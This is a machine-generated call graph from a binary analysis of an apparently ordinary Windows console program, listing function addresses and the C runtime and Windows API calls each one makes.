5d9963 75469 5b1f33 75382->75469 75385 5d9975 75386 5d99ce 75385->75386 75387 5d99b7 GetStdHandle GetConsoleScreenBufferInfo 75385->75387 75388 5a1e0c ctype 2 API calls 75386->75388 75387->75386 75389 5d99dc 75388->75389 75590 5c7b48 75389->75590 75391 5d9a29 75619 5db96d _CxxThrowException 75391->75619 75393 5d9a30 75620 5c7018 8 API calls 2 library calls 75393->75620 75395 5d9a7c 75621 5cddb5 6 API calls 2 library calls 75395->75621 75397 5d9a66 _CxxThrowException 75397->75395 75398 5d9aa6 75399 5d9aaa _CxxThrowException 75398->75399 75409 5d9ac0 75398->75409 75399->75409 75400 5d9a37 75400->75395 75400->75397 75401 5d9b3a 75625 5a1fa0 fputc 75401->75625 75404 5d9bfa _CxxThrowException 75429 5d9be6 75404->75429 75405 5d9b63 fputs 75626 5a1fa0 fputc 75405->75626 75408 5d9b79 strlen strlen 75410 5d9baa fputs fputc 75408->75410 75411 5d9e25 75408->75411 75409->75401 75409->75404 75622 5c7dd7 7 API calls 2 library calls 75409->75622 75623 5dc077 6 API calls 75409->75623 75624 5a1e40 free 75409->75624 75410->75429 75634 5a1fa0 fputc 75411->75634 75414 5d9e2c fputs 75635 5a1fa0 fputc 75414->75635 75416 5d9f0c 75640 5a1fa0 fputc 75416->75640 75419 5db67d 12 API calls 75419->75429 75420 5d9f13 fputs 75422 5d9e42 75422->75416 75457 5d9ee0 fputs 75422->75457 75636 5db650 fputc fputs fputs fputc 75422->75636 75637 5a21d8 fputs 75422->75637 75638 5dbde4 fputc fputs 75422->75638 75426 5a2e04 2 API calls 75426->75429 75429->75410 75429->75411 75429->75419 75429->75426 75437 5a31e5 malloc _CxxThrowException free _CxxThrowException 75429->75437 75441 5d9d2a fputs 75429->75441 75448 5d9d5f fputs 75429->75448 75627 5a21d8 fputs 75429->75627 75628 5a315e malloc _CxxThrowException free _CxxThrowException 75429->75628 75629 5a3221 malloc _CxxThrowException free _CxxThrowException 75429->75629 75630 5a1089 malloc _CxxThrowException free _CxxThrowException 75429->75630 75632 5a1fa0 fputc 75429->75632 75633 5a1e40 free 75429->75633 75437->75429 75631 5a21d8 fputs 75441->75631 75448->75429 75639 5a1fa0 fputc 75457->75639 75464 5db5bc fputs 75463->75464 75465 5d994a 75463->75465 75659 5a1fa0 fputc 75464->75659 75465->75382 75607 5a1fb3 75465->75607 75467 5db5d5 75467->75465 75468 5db5d9 fputs 75467->75468 75468->75465 75470 5b1f4f 75469->75470 75471 5b1f6c 75469->75471 75702 5c1d73 5 API calls __EH_prolog 75470->75702 75660 5b29eb 75471->75660 75474 5b1f5e _CxxThrowException 75474->75471 75476 5b1fa3 75477 5b1fbc 75476->75477 75480 5a4fc0 5 API calls 75476->75480 75481 5b1fda 75477->75481 75482 5a2fec 3 API calls 75477->75482 75479 5b1f95 _CxxThrowException 75479->75476 75480->75477 75483 5b2022 wcscmp 75481->75483 75492 5b2036 75481->75492 75482->75481 75484 5b20af 75483->75484 75483->75492 75704 5c1d73 5 API calls __EH_prolog 75484->75704 75486 5b20a9 75705 5b393c 6 API calls 2 library calls 75486->75705 75487 5b20be _CxxThrowException 75487->75492 75489 5b20f4 75706 5b393c 6 API calls 2 library calls 75489->75706 75491 5b2108 75493 5b2135 75491->75493 75707 5b2e04 62 API calls 2 library calls 75491->75707 75492->75486 75495 5b219a 75492->75495 75501 5b2159 75493->75501 75708 5b2e04 62 API calls 2 library calls 75493->75708 75709 5c1d73 5 API calls __EH_prolog 75495->75709 75498 5b21a9 _CxxThrowException 75498->75501 75499 5b227f 75665 5b2aa9 75499->75665 75501->75499 75502 5b2245 75501->75502 75710 5c1d73 5 API calls __EH_prolog 75501->75710 75505 5a2fec 3 API calls 75502->75505 75508 5b225c 75505->75508 75506 5b22d9 75510 5b2302 75506->75510 75512 5a2fec 3 API calls 75506->75512 75507 5b2237 _CxxThrowException 75507->75502 75508->75499 75711 5c1d73 5 API calls __EH_prolog 75508->75711 75509 5a2fec 3 API calls 75509->75506 75683 5a4fc0 75510->75683 75512->75510 75514 5b2271 _CxxThrowException 75514->75499 75517 5b2322 75518 5b26c6 75517->75518 75530 5b23a1 75517->75530 75519 5b28ce 75518->75519 75520 5b2700 75518->75520 75724 5c1d73 5 API calls __EH_prolog 75518->75724 75521 5b293a 75519->75521 75531 5b28d5 75519->75531 75725 5b32ec 14 API calls 2 library calls 75520->75725 75524 5b293f 75521->75524 75525 5b29a5 75521->75525 75742 5a4eec 16 API calls 75524->75742 75527 5b29ae _CxxThrowException 75525->75527 75581 5b264d 75525->75581 75526 5b26f2 _CxxThrowException 75526->75520 75528 5b2713 75726 5b3a29 75528->75726 75534 5b247a wcscmp 75530->75534 75550 5b248e 75530->75550 75531->75581 75741 5c1d73 5 API calls __EH_prolog 75531->75741 75533 5b294c 75743 5a4ea1 8 API calls 75533->75743 75537 5b24cf wcscmp 75534->75537 75534->75550 75539 5b24ef wcscmp 75537->75539 75537->75550 75543 5b250f 75539->75543 75539->75550 75540 5b2953 75544 5a4fc0 5 API calls 75540->75544 75542 5b2920 _CxxThrowException 75542->75581 75715 5c1d73 5 API calls __EH_prolog 75543->75715 75544->75581 75547 5b251e _CxxThrowException 75549 5b252c 75547->75549 75548 5b27cf 75551 5b2880 75548->75551 75556 5b281f 75548->75556 75737 5c1d73 5 API calls __EH_prolog 75548->75737 75557 5b2569 75549->75557 75716 5b2e04 62 API calls 2 library calls 75549->75716 75550->75549 75712 5a4eec 16 API calls 75550->75712 75713 5a4ea1 8 API calls 75550->75713 75714 5c1d73 5 API calls __EH_prolog 75550->75714 75554 5b289b 75551->75554 75561 5a2fec 3 API calls 75551->75561 75552 5a2fec 3 API calls 75553 5b27a9 75552->75553 75553->75548 75736 5a3563 memmove 75553->75736 75554->75581 75740 5c1d73 5 API calls __EH_prolog 75554->75740 75556->75551 75566 5b2847 75556->75566 75738 5c1d73 5 API calls __EH_prolog 75556->75738 75558 5b258c 75557->75558 75717 5b2e04 62 API calls 2 library calls 75557->75717 75564 5b25a4 75558->75564 75718 5b2a61 malloc _CxxThrowException free _CxxThrowException memcpy 75558->75718 75559 5b24c1 _CxxThrowException 75559->75537 75561->75554 75719 5a4eec 16 API calls 75564->75719 75565 5b2811 _CxxThrowException 75565->75556 75566->75551 75739 5c1d73 5 API calls __EH_prolog 75566->75739 75573 5b25ad 75720 5c1b07 49 API calls 75573->75720 75574 5b28c0 _CxxThrowException 75574->75519 75575 5b2839 _CxxThrowException 75575->75566 75576 5b2872 _CxxThrowException 75576->75551 75578 5b25b4 75721 5a4ea1 8 API calls 75578->75721 75580 5b25bb 75582 5a2fec 3 API calls 75580->75582 75584 5b25d6 75580->75584 75581->75385 75582->75584 75583 5b261f 75583->75581 75586 5a2fec 3 API calls 75583->75586 75584->75581 75584->75583 75722 5c1d73 5 API calls __EH_prolog 75584->75722 75588 5b263f 75586->75588 75587 5b2611 _CxxThrowException 75587->75583 75723 5a859e malloc _CxxThrowException free _CxxThrowException 75588->75723 75591 5c7b52 __EH_prolog 75590->75591 75762 5c7eec 75591->75762 75594 5c7ca4 75594->75391 75595 5a30ea malloc _CxxThrowException free 75597 5c7b63 75595->75597 75596 5a2e04 malloc _CxxThrowException 75596->75597 75597->75594 75597->75595 75597->75596 75599 5a1e40 free ctype 75597->75599 75601 5b12a5 5 API calls 75597->75601 75602 5e04d2 5 API calls 75597->75602 75603 5a429a 3 API calls 75597->75603 75605 5c7c61 memcpy 75597->75605 75606 5c7193 free 75597->75606 75767 5c70ea 75597->75767 75770 5c7a40 75597->75770 75788 5c7cc3 6 API calls 75597->75788 75789 5c74eb malloc _CxxThrowException memcpy __EH_prolog ctype 75597->75789 75599->75597 75601->75597 75602->75597 75603->75597 75605->75597 75606->75597 75608 5a1fbd __EH_prolog 75607->75608 75796 5a26dd 75608->75796 75611 5a2e47 2 API calls 75612 5a1fda 75611->75612 75799 5a2010 75612->75799 75614 5a1fed 75802 5a1e40 free 75614->75802 75616 5a1ff5 75803 5a1e40 free 75616->75803 75618 5a1ffd 75618->75382 75619->75393 75620->75400 75621->75398 75622->75409 75623->75409 75624->75409 75625->75405 75626->75408 75627->75429 75628->75429 75629->75429 75630->75429 75631->75429 75632->75429 75633->75429 75634->75414 75635->75422 75636->75422 75637->75422 75638->75422 75639->75422 75640->75420 75659->75467 75661 5a2f1c 2 API calls 75660->75661 75664 5b29fe 75661->75664 75663 5b1f7e 75663->75476 75703 5c1d73 5 API calls __EH_prolog 75663->75703 75744 5a1e40 free 75664->75744 75666 5b2ab3 __EH_prolog 75665->75666 75677 5b2b0f 75666->75677 75745 5a2e8a 75666->75745 75669 5b22ad 75669->75506 75669->75509 75671 5b2bc6 75755 5c1d73 5 API calls __EH_prolog 75671->75755 75672 5b2b04 75750 5a1e40 free 75672->75750 75675 5b2bd6 _CxxThrowException 75675->75669 75677->75669 75677->75671 75680 5b2b9f 75677->75680 75751 5b2cb4 48 API calls 2 library calls 75677->75751 75752 5b2bf5 8 API calls __EH_prolog 75677->75752 75753 5b2a61 malloc _CxxThrowException free _CxxThrowException memcpy 75677->75753 75680->75669 75754 5c1d73 5 API calls __EH_prolog 75680->75754 75682 5b2bb8 _CxxThrowException 75682->75671 75684 5a4fd2 75683->75684 75690 5a4fce 75683->75690 75685 5c7ebb free 75684->75685 75686 5a4fd9 75685->75686 75687 5a5006 75686->75687 75688 5a4fe9 _CxxThrowException 75686->75688 75689 5a4ffe 75686->75689 75687->75690 75757 5a1524 malloc _CxxThrowException __EH_prolog ctype 75687->75757 75688->75689 75756 5e0551 malloc _CxxThrowException free memcpy ctype 75689->75756 75693 5b384c 75690->75693 75696 5b3856 __EH_prolog 75693->75696 75694 5a2e04 malloc _CxxThrowException 75694->75696 75695 5a2fec 3 API calls 75695->75696 75696->75694 75696->75695 75697 5a2f88 3 API calls 75696->75697 75698 5e04d2 5 API calls 75696->75698 75700 5a1e40 free ctype 75696->75700 75701 5b3917 75696->75701 75758 5b3b76 malloc _CxxThrowException __EH_prolog ctype 75696->75758 75697->75696 75698->75696 75700->75696 75701->75517 75702->75474 75703->75479 75704->75487 75705->75489 75706->75491 75707->75493 75708->75501 75709->75498 75710->75507 75711->75514 75712->75550 75713->75550 75714->75559 75715->75547 75716->75557 75717->75558 75718->75564 75719->75573 75720->75578 75721->75580 75722->75587 75723->75581 75724->75526 75725->75528 75727 5b3a3b 75726->75727 75728 5b2722 75726->75728 75759 5b3bd9 free ctype 75727->75759 75728->75548 75728->75552 75730 5b3a42 75731 5b3a6f 75730->75731 75732 5b3a52 _CxxThrowException 75730->75732 75733 5b3a67 75730->75733 75731->75728 75761 5b3b76 malloc _CxxThrowException __EH_prolog ctype 75731->75761 75732->75733 75760 5e0551 malloc _CxxThrowException free memcpy ctype 75733->75760 75736->75548 75737->75565 75738->75575 75739->75576 75740->75574 75741->75542 75742->75533 75743->75540 75744->75663 75746 5a2ea0 75745->75746 75746->75746 75747 5a2ba6 2 API calls 75746->75747 75748 5a2eaf 75747->75748 75749 5b2a61 malloc _CxxThrowException free _CxxThrowException memcpy 75748->75749 75749->75672 75750->75677 75751->75677 75752->75677 75753->75677 75754->75682 75755->75675 75756->75687 75757->75687 75758->75696 75759->75730 75760->75731 75761->75731 75763 5c7f14 75762->75763 75765 5c7ef7 75762->75765 75763->75597 75764 5c7193 free 75764->75765 75765->75763 75765->75764 75790 5a1e40 free 75765->75790 75768 5a2e04 2 API calls 75767->75768 75769 5c7103 75768->75769 75769->75597 75771 5c7a4a __EH_prolog 75770->75771 75791 5a361b 6 API calls 2 library calls 75771->75791 75773 5c7a78 75792 5a361b 6 API calls 2 library calls 75773->75792 75775 5c7a83 75776 5c7b20 75775->75776 75781 5a2e04 malloc _CxxThrowException 75775->75781 75782 5a2fec 3 API calls 75775->75782 75783 5a2fec 3 API calls 75775->75783 75784 5e04d2 5 API calls 75775->75784 75787 5a1e40 free ctype 75775->75787 75793 5c7955 malloc _CxxThrowException __EH_prolog ctype 75775->75793 75794 5d2db9 free ctype 75776->75794 75778 5c7b2b 75795 5d2db9 free ctype 75778->75795 75780 5c7b37 75780->75597 75781->75775 75782->75775 75785 5c7aca wcscmp 75783->75785 75784->75775 75785->75775 75787->75775 75788->75597 75789->75597 75790->75765 75791->75773 75792->75775 75793->75775 75794->75778 75795->75780 75797 5a1e0c ctype 2 API calls 75796->75797 75798 5a1fcb 75797->75798 75798->75611 75804 5a2033 75799->75804 75802->75616 75803->75618 75805 5a203b 75804->75805 75806 5a2054 75805->75806 75807 5a2045 75805->75807 75812 5a37ff 9 API calls 75806->75812 75811 5a421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 75807->75811 75810 5a2022 fputs 75810->75614 75811->75810 75812->75810 75815 626bc6 75816 626bcd 75815->75816 75818 626bca 75815->75818 75817 626bd1 malloc 75816->75817 75816->75818 75817->75818 75819 5ccefb 75820 5ccf03 75819->75820 75850 5cd0cc 75819->75850 75820->75850 75866 5ccae9 VariantClear 75820->75866 75822 5ccf59 75822->75850 75867 5ccae9 VariantClear 75822->75867 75824 5ccf71 75824->75850 75868 5ccae9 VariantClear 75824->75868 75826 5ccf87 75826->75850 75869 5ccae9 VariantClear 75826->75869 75828 5ccf9d 75828->75850 75870 5ccae9 VariantClear 75828->75870 75830 5ccfb3 75830->75850 75871 5ccae9 VariantClear 75830->75871 75832 5ccfc9 75832->75850 75872 5a4504 malloc _CxxThrowException 75832->75872 75834 5ccfdc 75835 5a2e04 2 API calls 75834->75835 75836 5ccfe7 75835->75836 75837 5cd009 75836->75837 75838 5a2f88 3 API calls 75836->75838 75839 5cd07b 75837->75839 75840 5cd080 75837->75840 75841 5cd030 75837->75841 75838->75837 75880 5a1e40 free 75839->75880 75877 5c7a0c CharUpperW 75840->75877 75844 5a2e04 2 API calls 75841->75844 75847 5cd038 75844->75847 75845 5cd0c4 75881 5a1e40 free 75845->75881 75846 5cd08b 75878 5bfdbc 4 API calls 2 library calls 75846->75878 75849 5a2e04 2 API calls 75847->75849 75852 5cd046 75849->75852 75873 5bfdbc 4 API calls 2 library calls 75852->75873 75853 5cd0a7 75855 5a2fec 3 API calls 75853->75855 75857 5cd0b3 75855->75857 75856 5cd057 75858 5a2fec 3 API calls 75856->75858 75879 5a1e40 free 75857->75879 75860 5cd063 75858->75860 75874 5a1e40 free 75860->75874 75862 5cd06b 75875 5a1e40 free 75862->75875 75864 5cd073 75876 5a1e40 free 75864->75876 75866->75822 75867->75824 75868->75826 75869->75828 75870->75830 75871->75832 75872->75834 75873->75856 75874->75862 75875->75864 75876->75839 75877->75846 75878->75853 75879->75839 75880->75845 75881->75850 75882 5ac3bd 75883 5ac3db 75882->75883 75884 5ac3ca 75882->75884 75884->75883 75886 5a1e40 free 75884->75886 75886->75883 75887 5d5475 75888 5a2fec 3 API calls 75887->75888 75889 5d54b4 75888->75889 75892 5dc911 75889->75892 75891 5d54bb 75893 5dc92f 75892->75893 75894 5dc926 GetTickCount 75892->75894 75895 5dc96d 75893->75895 75898 5dcb64 75893->75898 75956 5a2ab1 strcmp 75893->75956 75894->75893 75895->75898 75937 5dc86a 75895->75937 75898->75891 75900 5dc9ce 75900->75898 75903 5a27bb 3 API calls 75900->75903 75901 5dc95b 75901->75895 75957 5a3542 wcscmp 75901->75957 75907 5dc9e2 75903->75907 75905 5dca0a 75906 5dca21 75905->75906 75908 5a286d 5 API calls 75905->75908 75909 5dcb10 75906->75909 75916 5a286d 5 API calls 75906->75916 75907->75905 75959 5a286d 75907->75959 75911 5dca16 75908->75911 75945 5dcb74 75909->75945 75966 5a28fa malloc _CxxThrowException free memcpy _CxxThrowException 75911->75966 75919 5dca40 75916->75919 75918 5dcb59 75971 5dcb92 malloc _CxxThrowException free 75918->75971 75922 5a2fec 3 API calls 75919->75922 75923 5dca4e 75922->75923 75929 5a2033 10 API calls 75923->75929 75925 5dcb49 75970 5a1f91 fflush 75925->75970 75926 5dcb50 75928 5a27bb 3 API calls 75926->75928 75928->75918 75936 5dca6a 75929->75936 75930 5dcaf5 75969 5a28fa malloc _CxxThrowException free memcpy _CxxThrowException 75930->75969 75932 5a2fec 3 API calls 75932->75936 75935 5a2033 10 API calls 75935->75936 75936->75930 75936->75932 75936->75935 75967 5a3599 memmove 75936->75967 75968 5a3402 malloc _CxxThrowException free memmove _CxxThrowException 75936->75968 75939 5dc88c __aulldiv 75937->75939 75938 5dc8d3 strlen 75940 5dc8f1 75938->75940 75941 5dc900 75938->75941 75939->75938 75940->75941 75943 5a286d 5 API calls 75940->75943 75942 5a28a1 5 API calls 75941->75942 75944 5dc90c 75942->75944 75943->75940 75944->75900 75958 5a2ab1 strcmp 75944->75958 75946 5dcb7c strcmp 75945->75946 75947 5dcb1c 75945->75947 75946->75947 75947->75918 75948 5dc7d7 75947->75948 75949 5dc849 75948->75949 75950 5dc7ea 75948->75950 75951 5dc85a fputs 75949->75951 75973 5a1f91 fflush 75949->75973 75952 5dc7fe fputs 75950->75952 75972 5a25cb malloc _CxxThrowException free _CxxThrowException ctype 75950->75972 75951->75925 75951->75926 75952->75949 75956->75901 75957->75895 75958->75900 75974 5a1e9d 75959->75974 75962 5a28a1 75963 5a28b0 75962->75963 75963->75963 75979 5a267f 75963->75979 75965 5a28bf 75965->75905 75966->75906 75967->75936 75968->75936 75969->75909 75970->75926 75971->75898 75972->75952 75973->75951 75975 5a1ea8 75974->75975 75976 5a1ead 75974->75976 75978 5a263c malloc _CxxThrowException free memcpy _CxxThrowException 75975->75978 75976->75962 75978->75976 75980 5a26c2 75979->75980 75982 5a2693 75979->75982 75980->75965 75981 5a26c8 _CxxThrowException 75983 5a26dd 75981->75983 75982->75981 75984 5a26bc 75982->75984 75985 5a1e0c ctype 2 API calls 75983->75985 75988 5a2595 malloc _CxxThrowException free memcpy ctype 75984->75988 75987 5a26ea 75985->75987 75987->75965 75988->75980 75989 5dadb7 75990 5dadc1 __EH_prolog 75989->75990 75991 5a26dd 2 API calls 75990->75991 75992 5dae1d 75991->75992 75993 5a2e04 2 API calls 75992->75993 75994 5dae38 75993->75994 75995 5a2e04 2 API calls 75994->75995 75996 5dae44 75995->75996 75997 5a2e04 2 API calls 75996->75997 75998 5dae68 75997->75998 76005 5dad29 75998->76005 76002 5dae94 76003 5a2e04 2 API calls 76002->76003 76004 5daeb2 76003->76004 76006 5dad33 __EH_prolog 76005->76006 76007 5a2e04 2 API calls 76006->76007 76008 5dad5f 76007->76008 76009 5a2e04 2 API calls 76008->76009 76010 5dad72 76009->76010 76011 5daf2d 76010->76011 76012 5daf37 __EH_prolog 76011->76012 76023 5b34f4 malloc _CxxThrowException __EH_prolog 76012->76023 76014 5dafac 76015 5a2e04 2 API calls 76014->76015 76016 5dafbb 76015->76016 76017 5a2e04 2 API calls 76016->76017 76018 5dafca 76017->76018 76019 5a2e04 2 API calls 76018->76019 76020 5dafd9 76019->76020 76021 5a2e04 2 API calls 76020->76021 76022 5dafe8 76021->76022 76022->76002 76023->76014 76024 5e8eb1 76029 5e8ed1 76024->76029 76027 5e8ec9 76030 5e8edb __EH_prolog 76029->76030 76038 5e9267 76030->76038 76034 5e8efd 76043 5de5f1 free ctype 76034->76043 76036 5e8eb9 76036->76027 76037 5a1e40 free 76036->76037 76037->76027 76039 5e9271 __EH_prolog 76038->76039 76044 5a1e40 free 76039->76044 76041 5e8ef1 76042 5e922b free CloseHandle GetLastError ctype 76041->76042 76042->76034 76043->76036 76044->76041 76045 5da42c 76046 5da449 76045->76046 76047 5da435 fputs 76045->76047 76204 5d545d 76046->76204 76203 5a1fa0 fputc 76047->76203 76051 5a2e04 2 API calls 76052 5da4a1 76051->76052 76208 5c1858 76052->76208 76054 5da4c9 76270 5a1e40 free 76054->76270 76056 5da4d8 76057 5da4ee 76056->76057 76059 5dc7d7 ctype 6 API calls 76056->76059 76058 5da50e 76057->76058 76271 5d57fb 76057->76271 76281 5dc73e 76058->76281 76059->76057 76063 5daae5 76436 5d2db9 free ctype 76063->76436 76065 5dac17 76437 5d2db9 free ctype 76065->76437 76066 5a1e0c ctype 2 API calls 76068 5da53a 76066->76068 76069 5da54d 76068->76069 76407 5db0fa malloc _CxxThrowException __EH_prolog 76068->76407 76077 5a2fec 3 API calls 76069->76077 76070 5dac23 76071 5dac3a 76070->76071 76073 5dac35 76070->76073 76439 5db96d _CxxThrowException 76071->76439 76438 5db988 33 API calls __aulldiv 76073->76438 76076 5dac42 76440 5a1e40 free 76076->76440 76082 5da586 76077->76082 76079 5dac4d 76080 5c3247 free 76079->76080 76081 5dac5d 76080->76081 76441 5a1e40 free 76081->76441 76299 5dad06 76082->76299 76087 5dac7d 76442 5a11c2 free __EH_prolog ctype 76087->76442 76091 5b3a29 5 API calls 76093 5da62e 76091->76093 76203->76046 76205 5d5466 76204->76205 76206 5d5473 76204->76206 76445 5a275e malloc _CxxThrowException free ctype 76205->76445 76206->76051 76209 5c1862 __EH_prolog 76208->76209 76446 5c021a 76209->76446 76214 5c18b9 76460 5c1aa5 free __EH_prolog ctype 76214->76460 76216 5c1935 76465 5c1aa5 free __EH_prolog ctype 76216->76465 76217 5c18c7 76461 5d2db9 free ctype 76217->76461 76220 5c1944 76241 5c1966 76220->76241 76466 5c1d73 5 API calls __EH_prolog 76220->76466 76222 5c18d3 76222->76054 76224 5e04d2 5 API calls 76230 5c18db 76224->76230 76225 5c1958 _CxxThrowException 76225->76241 76226 5c19be 76469 5cf1f1 malloc _CxxThrowException free _CxxThrowException 76226->76469 76229 5a2e04 2 API calls 76229->76241 76230->76216 76230->76224 76462 5c0144 malloc _CxxThrowException free _CxxThrowException 76230->76462 76463 5a1524 malloc _CxxThrowException __EH_prolog ctype 76230->76463 76464 5a1e40 free 76230->76464 76231 5c19d6 76233 5c7ebb free 76231->76233 76235 5c19e1 76233->76235 76234 5a631f 9 API calls 76234->76241 76237 5b12d4 4 API calls 76235->76237 76236 5e04d2 5 API calls 76236->76241 76238 5c19ea 76237->76238 76240 5c7ebb free 76238->76240 76242 5c19f7 76240->76242 76241->76226 76241->76229 76241->76234 76241->76236 76467 5a1524 malloc _CxxThrowException __EH_prolog ctype 76241->76467 76468 5a1e40 free 76241->76468 76244 5b12d4 4 API calls 76242->76244 76251 5c19ff 76244->76251 76245 5c1a4f 76471 5a1e40 free 76245->76471 76246 5a1524 malloc _CxxThrowException 76246->76251 76248 5c1a57 76472 5d2db9 free ctype 76248->76472 76250 5c1a64 76473 5d2db9 free ctype 76250->76473 76251->76245 76251->76246 76254 5c1a83 76251->76254 76470 5a42e3 CharUpperW 76251->76470 76474 5c1d73 5 API calls __EH_prolog 76254->76474 76256 5c1a97 _CxxThrowException 76257 5c1aa5 __EH_prolog 76256->76257 76475 5a1e40 free 76257->76475 76259 5c1ac8 76476 5c02e8 free ctype 76259->76476 76261 5c1ad1 76477 5c1eab free __EH_prolog ctype 76261->76477 76263 5c1add 76478 5a1e40 free 76263->76478 76265 5c1ae5 76479 5a1e40 free 76265->76479 76267 5c1aed 76480 5d2db9 free ctype 76267->76480 76269 5c1afa 76269->76054 76270->76056 76272 5d5805 __EH_prolog 76271->76272 76273 5d5847 76272->76273 76274 5a26dd 2 API calls 76272->76274 76273->76058 76275 5d5819 76274->76275 76608 5d5678 76275->76608 76279 5d583f 76625 5a1e40 free 76279->76625 76282 5dc748 __EH_prolog 76281->76282 76283 5dc7d7 ctype 6 API calls 76282->76283 76284 5dc75d 76283->76284 76642 5a1e40 free 76284->76642 76286 5dc768 76287 5c2c0b ctype free 76286->76287 76288 5dc775 76287->76288 76643 5a1e40 free 76288->76643 76290 5dc77d 76644 5a1e40 free 76290->76644 76292 5dc785 76645 5a1e40 free 76292->76645 76294 5dc78d 76646 5a1e40 free 76294->76646 76296 5dc795 76297 5c2c0b ctype free 76296->76297 76298 5da51d 76297->76298 76298->76063 76298->76066 76300 5dad29 2 API calls 76299->76300 76301 5da5d8 76300->76301 76302 5dbf3e 76301->76302 76303 5a2fec 3 API calls 76302->76303 76304 5dbf85 76303->76304 76305 5a2fec 3 API calls 76304->76305 76306 5da5ee 76305->76306 76306->76091 76407->76069 76436->76065 76437->76070 76438->76071 76439->76076 76440->76079 76441->76087 76445->76206 76447 5c0224 __EH_prolog 76446->76447 76481 5b3d66 76447->76481 76450 5c062e 76451 5c0638 __EH_prolog 76450->76451 76452 5c06de 76451->76452 76456 5c01bc malloc _CxxThrowException free _CxxThrowException memcpy 76451->76456 76459 5c06ee 76451->76459 76497 5c0703 76451->76497 76567 5d2db9 free ctype 76451->76567 76568 5c019a malloc _CxxThrowException free memcpy 76452->76568 76454 5c06e6 76569 5c1453 26 API calls 2 library calls 76454->76569 76456->76451 76459->76214 76459->76230 76460->76217 76461->76222 76462->76230 76463->76230 76464->76230 76465->76220 76466->76225 76467->76241 76468->76241 76469->76231 76470->76251 76471->76248 76472->76250 76473->76222 76474->76256 76475->76259 76476->76261 76477->76263 76478->76265 76479->76267 76480->76269 76492 63fb10 76481->76492 76483 5b3d70 GetCurrentProcess 76493 5b3e04 76483->76493 76485 5b3d8d OpenProcessToken 76486 5b3d9e LookupPrivilegeValueW 76485->76486 76487 5b3de3 76485->76487 76486->76487 76488 5b3dc0 AdjustTokenPrivileges 76486->76488 76489 5b3e04 CloseHandle 76487->76489 76488->76487 76490 5b3dd5 GetLastError 76488->76490 76491 5b3def 76489->76491 76490->76487 76491->76450 76492->76483 76494 5b3e0d 76493->76494 76495 5b3e11 CloseHandle 76493->76495 76494->76485 76496 5b3e21 76495->76496 76496->76485 76565 5c070d __EH_prolog 76497->76565 76498 5c0b40 76498->76451 76499 5c0e1d 76605 5c0416 18 API calls 2 library calls 76499->76605 76501 5c0ea6 76607 5eec78 free ctype 76501->76607 76502 5c0d11 76599 5a7496 7 API calls 2 library calls 76502->76599 76503 5c0c13 76596 5a1e40 free 76503->76596 76505 5c0c83 76505->76499 76505->76502 76506 5a2da9 2 API calls 76506->76565 76510 5c0de0 76601 5d2db9 free ctype 76510->76601 76511 5a2da9 2 API calls 76553 5c0ab5 76511->76553 76512 5c0e47 76512->76501 76606 5c117d 68 API calls 2 library calls 76512->76606 76513 5a2f1c 2 API calls 76543 5c0d29 76513->76543 76515 5c0df8 76603 5a1e40 free 76515->76603 76516 5a2e04 2 API calls 76516->76565 76518 5a2e04 2 API calls 76518->76553 76522 5c0e02 76604 5d2db9 free ctype 76522->76604 76523 5a2e04 2 API calls 76523->76543 76525 5a2fec 3 API calls 76525->76565 76529 5a2fec 3 API calls 76529->76543 76530 5a2fec 3 API calls 76530->76553 76534 5c050b 44 API calls 76534->76553 76536 5c0b26 76588 5a1e40 free 76536->76588 76537 5c0df3 76602 5a1e40 free 76537->76602 76540 5a1e40 free ctype 76540->76543 76542 5e04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76542->76565 76543->76510 76543->76513 76543->76515 76543->76523 76543->76529 76543->76537 76543->76540 76600 5c117d 68 API calls 2 library calls 76543->76600 76544 5c0c79 76598 5a1e40 free 76544->76598 76545 5c0b30 76589 5a1e40 free 76545->76589 76546 5a1e40 free ctype 76546->76553 76549 5a1524 malloc _CxxThrowException 76549->76565 76551 5c0b38 76590 5a1e40 free 76551->76590 76553->76503 76553->76511 76553->76518 76553->76530 76553->76534 76553->76544 76553->76546 76587 5a2f4a malloc _CxxThrowException free ctype 76553->76587 76592 5a1089 malloc _CxxThrowException free _CxxThrowException 76553->76592 76593 5c13eb 5 API calls 2 library calls 76553->76593 76594 5c0ef4 68 API calls 2 library calls 76553->76594 76595 5d2db9 free ctype 76553->76595 76597 5c0021 GetLastError 76553->76597 76561 5c0b48 76591 5d2db9 free ctype 76561->76591 76564 5a1e40 free ctype 76564->76565 76565->76498 76565->76505 76565->76506 76565->76516 76565->76525 76565->76536 76565->76542 76565->76549 76565->76553 76565->76561 76565->76564 76566 5d2db9 free ctype 76565->76566 76570 5a2f4a malloc _CxxThrowException free ctype 76565->76570 76571 5a1089 malloc _CxxThrowException free _CxxThrowException 76565->76571 76572 5c13eb 5 API calls 2 library calls 76565->76572 76573 5c050b 76565->76573 76578 5c0021 GetLastError 76565->76578 76579 5a49bd 9 API calls 2 library calls 76565->76579 76580 5c0306 12 API calls 76565->76580 76581 5bff00 5 API calls 2 library calls 76565->76581 76582 5c057d 16 API calls 2 library calls 76565->76582 76583 5c0f8e 24 API calls 2 library calls 76565->76583 76584 5a472e CharUpperW 76565->76584 76585 5b8984 malloc _CxxThrowException free _CxxThrowException memcpy 76565->76585 76586 5c0ef4 68 API calls 2 library calls 76565->76586 76566->76565 76567->76451 76568->76454 76569->76459 76570->76565 76571->76565 76572->76565 76574 5a6c72 44 API calls 76573->76574 76576 5c051e 76574->76576 76575 5c0575 76575->76565 76576->76575 76577 5a2f88 3 API calls 76576->76577 76577->76575 76578->76565 76579->76565 76580->76565 76581->76565 76582->76565 76583->76565 76584->76565 76585->76565 76586->76565 76587->76553 76588->76545 76589->76551 76590->76498 76591->76536 76592->76553 76593->76553 76594->76553 76595->76553 76596->76498 76597->76553 76598->76505 76599->76543 76600->76543 76601->76498 76602->76515 76603->76522 76604->76498 76605->76512 76606->76512 76607->76498 76609 5d5689 76608->76609 76610 5d56b1 76608->76610 76611 5d5593 6 API calls 76609->76611 76626 5d5593 76610->76626 76613 5d56a5 76611->76613 76616 5a28a1 5 API calls 76613->76616 76616->76610 76618 5d570e fputs 76624 5a1fa0 fputc 76618->76624 76620 5d56ef 76621 5d5593 6 API calls 76620->76621 76622 5d5701 76621->76622 76623 5d5711 6 API calls 76622->76623 76623->76618 76624->76279 76625->76273 76627 5d55ad 76626->76627 76628 5a28a1 5 API calls 76627->76628 76629 5d55b8 76628->76629 76630 5a286d 5 API calls 76629->76630 76631 5d55bf 76630->76631 76632 5a28a1 5 API calls 